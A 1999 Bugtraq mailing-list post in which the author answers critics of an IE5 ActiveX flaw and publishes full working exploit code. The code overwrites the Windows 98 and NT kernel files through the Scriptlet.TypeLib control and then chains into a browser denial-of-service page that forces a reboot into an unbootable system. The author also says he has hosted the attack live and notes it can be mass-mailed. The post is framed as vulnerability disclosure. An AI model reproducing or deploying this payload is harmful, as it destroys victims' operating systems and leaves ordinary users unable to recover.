From: SysAdmin [SysAdmin@SASSPRODUCTIONS.COM]
Sent: Monday, August 30, 1999 9:16 PM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: IE5 allows executing programs

After further research into David LeBlanc's debunking of my posting I have
discovered (rather remembered) that ntoskrnl is loaded from the system
folder into memory where it is accessed exclusively, this frees it from the
write restriction due to system use. I think he must administrate Windows 98
domains which do not let you modify the Kernel (called Krnl386.exe) I'm
sorry I have taken so long to respond to the criticism but I felt that I,
unlike others, should do my research first. Let me summarize the current
understanding

ANY Windows 98 file can be overwritten. Period. If you try and manually
pasting over or destroying the file you will be denied, however Active X can
help where you can't. In fact, ironically, after it's been corrupted you
cannot fix it because you are denied from touching it! If Windows 98 is
restarted or crashed (hint, forced to crash), then it will fail start up
with a Fatal Exception, you can only recover from DOS by restoring the file.
I would like to note, for the record, that the vast majority of home users
who will never know about the patch to this file or know what Active X even
is are not in possession of 98 install disks. Rather they are in possession
of a disk that restores the computer to factory original. Despite David
LeBlanc et al. assurance that we could just disable Active X I'm discussing
it because you know your poor parents are NEVER going to, how would they
understand the instructions? And, of course, what average user could EVER
recover from this sort of damage?

Onto Windows NT, yes, David was correct, you can bar write access in NTFS
and it cannot be written to. I have not invested any interest in this but I
assume there is at least one critical system file (possibly security file)
that he would miss and might be overwritten. In fact the default for the
Administrator or one with Administrator privileges is Full Access. Of course
this would allow the exploit to run. The other thing to remember is that in
very small domains the average user is generally administrator and remember
this exploit can be E-Mailed!!! or mass-mailed! get my drift? The other
thing is that the default install for NT (especially on HP's) is FAT, which
does not allow specific file security. Anyone know a dual-booter? Maybe
someone who doesn't even know what NTFS is? I thought so.

Well, I must admit I'm tired of the down playing and guessing. I have
decided to put the ball in play. I have posted a web page, on my domain mind
you, that contains the Hacks for both OS's. Understand that if you visit
them the hack will run and when it runs, if you're not prepared, you will be
very unhappy. I have included the code here so that you can see what
happens.


The link is http://www.sassproductions.com/hacked.htm

The code for the 98 exploit is

 <p>
<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>

</p>

See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.

<html>

<head>
<title>Self Destruct </title>
</head>

<body>
<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

Recognize that? It's the code to DoS IE5. Most simple users would restart at
this point, never notice a web page change, and lose their Kernel.

Here's the NT code

<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>
</p>

Not bad 'huh? This exploit needs to be realized for what it is, a very
dangerous problem. If someone mass-mailed it to my domain I wouldn't be able
to deal with bouncing between three offices helping EVERY single user.

If someone has a problem with my post feel free to mention it.

Seth Georgion